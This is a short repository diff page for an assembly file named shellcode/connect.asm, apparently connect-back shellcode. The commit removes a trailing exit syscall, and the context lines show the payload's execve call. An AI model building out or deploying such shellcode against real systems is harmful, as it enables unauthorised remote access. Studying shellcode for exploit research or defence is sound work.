aboutsummaryrefslogtreecommitdiff
path: root/shellcode/connect.asm
diff options
context:
space:
mode:
Diffstat (limited to 'shellcode/connect.asm')
-rw-r--r--shellcode/connect.asm6
1 files changed, 0 insertions, 6 deletions
diff --git a/shellcode/connect.asm b/shellcode/connect.asm
index 3464a3e..fe5002a 100644
--- a/shellcode/connect.asm
+++ b/shellcode/connect.asm
@@ -58,9 +58,3 @@ mov ebx,esp ; arg
mov byte [esp + 8], al ; null-terminate the string
mov al,0xb ; execve syscall
int 0x80
-
-; exit()
-mov al,0x1 ; exit syscall
-xor ebx,ebx
-mov bl,0x42 ; return code
-int 0x80 ; kernel mode